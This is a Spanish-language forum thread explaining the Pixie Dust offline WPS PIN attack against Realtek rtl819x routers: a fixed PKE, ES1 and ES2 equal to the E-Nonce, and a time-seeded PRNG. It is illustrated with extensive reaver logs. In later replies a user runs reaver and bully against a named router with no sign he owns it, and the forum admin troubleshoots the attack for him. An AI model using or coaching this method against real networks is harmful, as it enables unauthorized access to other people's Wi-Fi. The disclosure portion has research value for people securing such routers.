Pixie dust WPS : ¡Realtek ("rtl819x project") cae también! (Pagina 1) / Preguntas generales y busqueda de nuevas brechas / Foro Wifi-libre.com

El libre pensamiento para un internet libre

No estas registrado.     

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

#1 12-04-2015 17:40:35

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,051

Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

El método de brute force offline al estilo "Pixie dust" es adaptable a los dispositivos equipados de chipset realtek 

  ¡Gran noticia! . cool

200.gif

  Les cuento ahora la historia de este descubrimiento alucinante con todos los detalles. wink
Lo dejaba claramente entender ayer mañana en esta respuesta :

kcdtv escribió:
Betis escribió:

cuando un nounce se repite aunque sea diferente mi teoria es que de algun lado se genera una nueva clave, o cadena de paso para genera alguna parte de ES-0 de ES2 o bien de E-Hash o cuaquier de los PKE,PKR  en el paso de M2 ante de llega a M3 pero bueno no te puedo decir nada asta ver por mi mismo ey probarlo en directo seria interesante analiza un cap con la variable de este bug

   En este caso (SDK realtek rtl9xxx); lo que pasa es que el punto de acceso genera siempre la misma PKE; cual sea el router.
Por lo tanto tenemos una entropía nula del lado del punto de acseso en el intercambio de llave DF.
Entonces podemos efectuar un ataque tipo Pixie dust contra Realtek si sabemos cual es el valor (, o como se genera ) empleado para ES1 y ES2
   Sabemos que no es 0 como en el caso Ralink o que nos es el mismo intervalo que con los broadcom afectados
Pronto les dije cual es. smile

"Pixie Dust" ataque de fuerza bruta offline para generar el PIN valido - respuesta 52

  Tenía que guardar el "secreto" hasta que nuestro amigo soxrok2212 anunciase oficialmente la cosa en el hilo "Pixie Dust" de kali.
Ya ha hablado (cf WPS Pixie Dust Attack (Offline WPS Attack) - respuesta 180 ) así que yo también puedo. cool

  Después la salida de pixiewps - que materializó semanas de esfuerzos -  hemos decidido no parrar en camino y intentar seguir investigando conjuntamente el caso de los chipsets realtek con el material que tenemos.
  Personalmente tengo un afla AIPWH525 y un totolink 300NR y soxrok un belkin F9K1110
Tres Routers bastante modernos con chipset de marca realtek.
Cada router tiene un chipset diferente pero lo que tiene en común es que comparten  la "misma base" : el kit de desarrolló SDK "RTL819X" conocido como  "proyecto rtl819x"

1) Parámetros WPS por defecto pésimos : WPS activado con un PIN fijo (no se puede cambiar)

  Lo primero que nos ha llamado la atención (y nos ha animado a seguir adelante) es que estos routers tienen el wps... pasar me la expresión... como el culo.
Esta todo pensado al revés. Por ejemplo hay desactivar el WPS:

 

  • WPS ACTIVADO POR DEFECTO

  • PIN FIJO PERMANENTE

realteckpisie.jpg

realteckpixie2.jpg

Cuando miramos  el apartado WPS de las interfaces de configuración nos damos cuenta que son iguales:  solo cambia el aspecto gráfico
Y podemos notar que ambos PIN por defecto empiezan por 0.
¿Coincidencia? ¿O no?...
.... Si estaríamos en un sistema aleatorio puro teníamos una probabilidad sobre 20 de encontrar dos veces 0 como primer dígito....
¿Sospechoso? 
Un poco/bastante. tongue
Pero no es nada en comparación con lo que descubrimos a continuación...

PD: ... la unica cosa que salvaba estos PA es que tienen un AP rate limit que se dispara después tres intentos, de los chungos.
Pero si podemos hacer un ataque pixie dust, de nada sirve (un solo intento fallido)

2) Repetición de la misma PKE cual sea el modelo...

A continuación les dejo unas muestras de un ataque con reaver_mod contra mis punto de acceso...
Son estas muestras que nos hicieron literalmente "flipar en colores". Pero sin recurrir a paraísos artificiales , claros y frescos  como unas rosas....

[P] E-Nonce: 1d:f2:a6:ab:10:f3:61:00:1d:2d:56:9c:68:d0:58:53
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[+] Received M1 message
[P] AuthKey: 6c:7e:a0:4f:2b:e4:cc:a1:3c:98:8e:c3:96:0a:9f:0e:95:ab:9c:a0:0f:c5:6d:ab:19:5b:1a:e2:48:67:9e:40
[+] Sending M2 message
[P] E-Hash1: d7:26:cf:5e:09:8c:52:dd:4d:13:6b:0c:69:f8:23:59:ab:b3:09:03:bf:38:37:b6:36:ed:b1:12:30:9f:64:71
[P] E-Hash2: 3d:31:26:b1:34:28:c6:7c:ad:30:5c:b9:4f:38:b6:15:a6:2b:c1:e9:ad:59:28:6c:fe:cc:a3:de:38:68:c6:b0
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 5e:d4:51:9e:42:ba:11:b7:6c:09:b2:90:07:5c:ee:4a
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27
[+] Received M1 message
[P] AuthKey: d9:83:51:60:84:b7:0d:e2:11:86:c3:cf:9c:bb:5c:81:9c:9f:06:91:81:6e:cb:59:fc:92:96:5e:61:25:9a:ea
[+] Sending M2 message
[P] E-Hash1: 8a:00:55:d9:8a:73:cc:98:61:17:0a:2f:40:57:43:40:0b:59:c8:3c:26:dd:08:3d:7f:0b:19:2e:ee:22:fc:de
[P] E-Hash2: f7:93:87:f9:da:14:fc:18:ef:6a:cf:c0:50:0a:70:47:e5:1c:65:9d:a9:c2:03:d0:62:af:02:25:08:ff:28:91
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M5 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 60:19:2e:67:35:16:6b:e7:7b:60:be:20:66:5d:65:54
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e]8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2006-07-27

Siempre la misma  PKE lol 
   INCONCEBIBLE
Y más fuerte aún... : Sale en permanencia la misma PKE en mi otro punto de acceso:

[P] E-Nonce: 44:b2:7a:8a:4b:93:b5:20:57:ba:f9:47:5e:12:e8:d2
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
[+] Received M1 message
[P] AuthKey: 65:6f:56:03:5e:3a:ac:4e:eb:86:23:c4:3b:ab:e4:e0:a2:27:36:cb:69:04:9f:4a:8c:2a:79:a3:52:14:ed:e4
[+] Sending M2 message
[P] E-Hash1: 25:08:23:59:07:bb:fd:bb:ce:13:03:85:9b:b4:9b:25:ff:4d:9b:6a:ac:37:f0:d9:b2:22:b2:28:6a:95:74:dd
[P] E-Hash2: 2f:9e:f7:2d:1f:a9:99:8a:3e:10:4b:42:45:9d:43:fb:56:2f:bb:44:8b:5b:74:08:2d:1b:b0:45:b1:3a:f0:26
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 0e:47:95:66:69:fd:b4:85:0b:b3:0f:94:18:f2:c1:06
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20
[+] Received M1 message
[P] AuthKey: ed:d6:a1:b0:a5:02:87:8a:af:c1:8f:f1:81:40:e9:64:04:f7:36:9d:8f:17:c4:f7:78:00:5d:2a:7b:de:90:da
[+] Sending M2 message
[P] E-Hash1: 9c:c8:05:1e:cd:f4:a6:cd:d7:cf:09:e0:68:a3:42:1b:da:45:cd:04:ec:1c:bc:95:79:92:10:3f:c1:52:0c:b4
[P] E-Hash2: 2b:61:69:da:34:64:15:58:e3:0b:0a:71:44:fd:7f:51:a7:00:fb:2a:24:fb:49:56:18:cb:8f:08:3b:f5:df:60
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 29:ef:40:48:13:90:ac:c4:58:ec:ad:b8:2a:c7:fc:ce
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Number: EV-2010-09-20

3) Primeras conclusiones

Tenemos una implementación, pasarme la expresión, de mierda.
  Les recuerdo que teóricamente la PKE no debría repetirse.
Si La PKE se repite a veces es que tenemos a un sistema con entropía muy débil a nivel del intercambio de laves diffie hellmann
Si la PKE se repite reprime es simplemente que.... no hay entropiá ninguna. Y aqui tenemos cero entropía : siempre se usan los mismos valores para generar las PKE.
Sabemos que
   

  1. La PKE (enrolle = el router)  se forma así : g^A mod p

  2. La PKR (registar = se forma así : g^B mod p

Somos capaces de detreminar "g" "A" y "mod p" que son siempre iguales y por lo tanto seremos capaces de adivinar el valor de B.

  Hasta aquí llegamos con el compañero sorcxok... y nos decimos : "si tenemos un sitema de entropia nula para el intercambio de llave es seguro que tenemos también una entropía nula más tarde en el protocolo cuando se generan ES1 y ES2".
  Nos enfrentamos a la misma situación que con los chipsets Ralink : solo que el valor para generar ES1 y ES2 no es 0.
    Es otra cosa.
Asi que decidmos escribir a dominque Bongard para que nos ayude o por lo menos que nos diga si estamos en la buena vía.

4)  Dominique Bongard analiza el problema y encuentra la brecha

  Lo primero es decir bien alto lo amable y enrollado que es dominique Bongard.
Respondí ensegudia dicendo que iba a echar un ojo y pidiendonos más datos y un firmware...
Y dos días despues nos escribe para dar nos la solución smile 
Sin pedir nada - o lo que sea -  nos la regala sin  más, explicándonos en  detalles el porque big_smile

  Adivinar que se le ocurierón a los ingenios de realtek....

ES-1 = ES-2 = E-Nonce

  Es decir usar la misma cadena que es visible y en claro...... pam
No es 0 como para Ralink.
Es cierto; pero estamos al mismo niverl incompetencia. big_smile

  Esto si mandamos los PIN en un segundo  (ritmo por defecto en reaver ) y usando llaves DH largas (lo que significa que en este caso no podremos usar el opción -S en reaver) Dominique nos explica que es porque se usa el tiempo como semilla  ( random_r.c )

  ¿Que pasaría si mandamos los PIN en mas de un segundo (distancia, interferencias etc...)?
En este caso podemos usar un segundo método para derivar nuestro PIN :   
Simple; hacemos como para los Broadcom; un brute force del estado del PRNG.
Y en lugar de usar el intervalo que usa broadcom usaremos el tiempo sobre, digamos, un docena de segundos,
O treinta, o incluso dos minutos... ¡No importa! :
Se encuentra la coincidencia en un micro-segundo.
Incluso si, para ser seguro, usamos los 3600 segundos posibles que componen una hora big_smile

EDIT

Al final hemos podido comprobar que algunos chipset usan el momento del intercambio WPS y otros usan la fecha de la instalación del firmware en uso.
Asi que en unos casos el PIN se obtiene al instante y en otros se debe hacer un brute force de la semilla hasta llegar a la fecha de la instalación del firmware.
Para hacer este brute force el amigo wiire ha implementado en un primer tiempo el opción "-f" en pixiewps.
Luego la ha quitado porque pixiewps lo hace automáticamente cuando no encuentra el PIN al instante
El Pin valido se obtiene así en pocos minutos.

En conclusión

piSdVLJL4ggtq.gif

  Al final podemos decir que realtek ha hecho las cosas un poco mejor que ralink y un poco peor que broadcom. tongue
Si lanzamos el PIN en un segundo solo adaptamos el caso (y el código) ralink cambiando el cero de nuestras ES1 y ES2 por la nonce del router.
Si no conseguimos mandar el PIN en un segundo (o menos) cambiamos de táctica y usamos el método broadcom para hacer un brute force del estado del generador de números pseudo aleatorios. Pero esta vez usaremos valores de tiempo como semilla

  Wiire esta integrando los cambios en pixiewps (que ha sido oficialmente integrada en los repositorios de kali linux) y se sigue trabajando sobre reaver para hacer un ataque mas preciso.

Se trata de un tremendo avance ya que afecta a chipset modernos y a material producido sobre los cuatro últimos años (por lo menos) y aún en producción.

Muchas gracias a Dominique por habernos escuchado, atendido y por regalar nos tan gentilmente la solución y los detalles para poner de pie un método para explotar la brecha.

edit : aqui el tweet de dominique al respecto :

tweet.jpg

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 31-03-2016 18:18:35

sergio1985
Usuario

Registrado: 02-03-2016
Mensajes: 23

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Bien explicado gracias era lo que estaba buscando mac 00:13:33 realtek RTL 8671 wps model  EV-2006-07-27 wps model  ahora solo me queda probar y haber si tenemos suerte saludos

Desconectado

#3 31-03-2016 21:11:49

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,051

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Buenas smile

RTL 8671 

Esto me suena a uno de estos chipset "onboard" y no tengo claro que sea vulnerable... pero por otro lado tienes la misma etiqueta en "versión del wPS" que uno vulnerable :

EV-2006-07-27

  El opción brute force va mucho mas rápido con la ultima versión de pixiewps y te tomara 4-5 minutos como máximo (en lugar de 20-30)
Si tienes la misma PKE que la que ves en el tema, debería poder hacerse...
  Cuéntanos cómo te ha ido...
Suerte wink

Desconectado

#4 19-05-2016 05:33:22

sergio1985
Usuario

Registrado: 02-03-2016
Mensajes: 23

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Buenas a ver que opinas me tarde pero estoy aprendiendo soy novato en esto utilizo kali 2016.1 booteado en usb con adaptador alfa awuso36nh con antena direccional yagui

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212

[P] E-Nonce: 47:7e:ca:09:55:02:39:8a:05:0f:be:a0:4c:ab:fc:f8
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: b1:71:59:a8:11:56:37:b3:1a:64:84:0d:39:24:fc:dc
[P] PKR: 3c:5f:43:6e:d3:3a:57:d6:3c:20:f1:f3:9b:c2:c4:0d:65:29:32:b5:dc:5a:05:de:21:48:7f:74:c9:f3:41:7e:f8:3e:4a:55:ce:63:81:bf:01:50:07:ea:7a:00:22:c0:97:95:87:87:99:88:54:9e:67:ee:e2:eb:ab:96:42:ee:a2:ae:b2:d3:a2:a9:95:76:30:0e:89:19:54:ae:d4:be:63:5c:ac:c8:2a:59:5b:e1:46:b0:7d:34:20:09:44:cc:7f:f2:4e:81:21:b9:a5:53:d5:26:29:b5:86:4a:a2:cc:d0:18:ce:76:3e:0d:c9:bd:68:80:74:92:c9:0e:ee:4d:ba:da:22:31:4a:01:ca:7f:6e:84:2e:27:34:6c:db:e3:2f:12:c9:9c:81:9d:60:48:ca:ea:42:01:b1:ff:4f:ed:24:85:f3:87:3e:9d:e9:e2:1f:40:b6:9f:bb:76:4f:60:b7:14:f2:04:67:38:68:89:19:27:d0:02:40:bd:f7:66
[P] AuthKey: 09:84:cc:3e:23:40:6c:7f:fa:08:57:f8:2f:5d:a4:7a:6c:a1:12:2a:66:d9:d2:f4:b7:89:36:41:c2:4b:b4:6e
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.

comparando no son iguales no se repiten

[P] E-Nonce: 0b:04:55:50:49:7c:fc:d6:2c:bb:6b:4b:44:81:1f:de
[P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b
[P] WPS Manufacturer: Realtek Semiconductor Corp.
[P] WPS Model Name: RTL8671
[P] WPS Model Number: EV-2006-07-27
[P] Access Point Serial Number: 123456789012347
[+] Received M1 message
[P] R-Nonce: b1:f7:fc:e4:08:da:ec:15:46:0b:1c:b7:b2:bc:6c:78
[P] PKR: 2d:63:6d:74:cd:dc:8d:2a:f2:7a:c7:cf:eb:40:d6:2e:9c:9e:0e:2f:99:c2:42:de:e5:36:26:60:a6:88:c9:5b:d7:4e:9d:b2:8b:a2:c8:65:2c:ca:3f:c2:e8:3a:f1:4f:f0:d3:3f:a8:cf:2f:67:b8:5c:6d:2f:4b:96:03:82:c6:71:51:1b:ed:12:fa:f6:ea:94:78:38:82:ea:7c:44:0a:ef:1d:56:12:a8:bd:9b:9c:a2:8f:16:8e:be:be:d9:86:61:5d:3c:9c:ad:ea:9d:21:76:28:a5:58:94:94:0f:fb:71:10:40:b1:31:67:74:2d:17:9c:e4:bc:75:42:7d:2c:25:15:13:b1:48:51:0c:e3:ce:c6:16:ec:f7:9e:ac:90:1c:5b:11:9b:57:95:45:69:21:d4:3c:9d:83:f6:2e:9b:e2:c9:f5:6c:8f:10:dd:aa:8c:27:aa:70:28:e2:06:0d:81:7a:06:a6:e8:72:37:f5:79:1b:58:1d:a4:9e:0e:b1
[P] AuthKey: 8d:74:30:cf:46:b2:1f:10:6e:70:c2:7b:98:ea:47:3d:72:16:6f:df:73:8e:68:92:2e:91:43:9e:31:ba:09:19
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670.

Desconectado

#5 19-05-2016 13:20:30

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,051

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Buenas smile
He editado tu mensaje usando el opción insertar código para lo que sale en consola (así se hace en los foros wink )
El problema aquí es que no recibes el M3 y sin el M3 no puedes hacer un ataque pixiedust.
Hay dos razones posibles :

  1. condiciones de recepción-emisión (estas demasiado lejo del PA, hay demasiadas interferencias)

  2. El WPS PIN no esta habilitado del todo (puede que este solo en modo Push button, puede que no tenga el PIN configurado)

alfa awuso36nh

Mala elección, el chipset no funciona bien con reaver, puede que sea la razón, es una tercera razón posible para explicar el falló.
Has probado con bully?
Va mejor que reaver con este chipset (RT3070)

omparando no son iguales no se repiten

Si son iguales, fijate bien, es la PKE, no la PKR
Tienes la misma PKE que todos los chipset realteck vulnerables

d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b

(la que sale en rojo en le primer post de este tema wink )

Desconectado

#6 21-05-2016 18:25:30

sergio1985
Usuario

Registrado: 02-03-2016
Mensajes: 23

Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!

Bueno aqui la informacion con bully sin buenos resultados segun mi persona a ver a ti que te parece

ç

[email protected]:~# sudo bully wlan1mon -b 00:13:33:XXXXXXX -c 1 -v 3
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'wlan1mon' to channel '1'
[!] Using '00:0d:b0:XXXXXXX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '00:13:33:c5:84:a5' on channel '1'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'Rocabado' (00:13:33:c5:84:a5)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/001333XXXXXX.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
